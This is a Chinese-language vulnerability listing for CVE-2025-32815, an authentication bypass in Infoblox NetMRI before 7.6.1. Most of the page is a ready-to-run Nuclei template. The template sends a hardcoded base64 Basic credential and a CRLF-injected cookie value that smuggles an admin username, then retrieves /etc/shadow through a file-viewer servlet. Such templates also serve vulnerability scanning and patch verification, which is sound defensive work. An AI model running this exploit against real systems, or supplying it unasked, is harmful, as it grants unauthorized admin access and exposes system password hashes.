CVE-2025-32815: NetMRI < 7.6.1 - Authentication Bypass via Hardcoded Credentials

日期: 2025-08-01 | 影响软件: NetMRI | POC: 已公开

漏洞描述

An issue was discovered in Infoblox NETMRI before 7.6.1. Authentication Bypass via a Hardcoded credential can occur.

PoC代码[已公开]

id: CVE-2025-32815

info:
  name: NetMRI < 7.6.1 - Authentication Bypass via Hardcoded Credentials
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Authentication Bypass via a Hardcoded credential can occur.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32815
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-32815
    cwe-id: CWE-287
    epss-score: 0.23613
    epss-percentile: 0.95789
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: infoblox
    product: netmri
    fofa-query: icon_hash="-319724102"
  tags: cve,cve2025,auth-bypass,netmri,hardcoded,infoblox,vkev

http:
  - raw:
      - |
        GET /netmri/common/SetRawCookie.tdf?name=letmein&value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic X3BtOnBtMTk3MjY=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(set_cookie, "Skipjack-")'
        condition: and
        internal: true

  - raw:
      - |
        GET /visual/ViewerFileServlet?fileName=/etc/shadow HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'root:','bin:','netmri:')"
          - "contains(content_type, 'text/xml')"
        condition: and
# digest: 4a0a0047304502210083fff8e1a567e6da57f97a43f39fae6a50b3b13149f239b2d734078a1473e7be02204e9849429fe5f10fc5980e6734e7e1668040f791a0e477aa18a0d2307d1ddb23:922c64590222798bb761d5b6d8e72950

相关漏洞推荐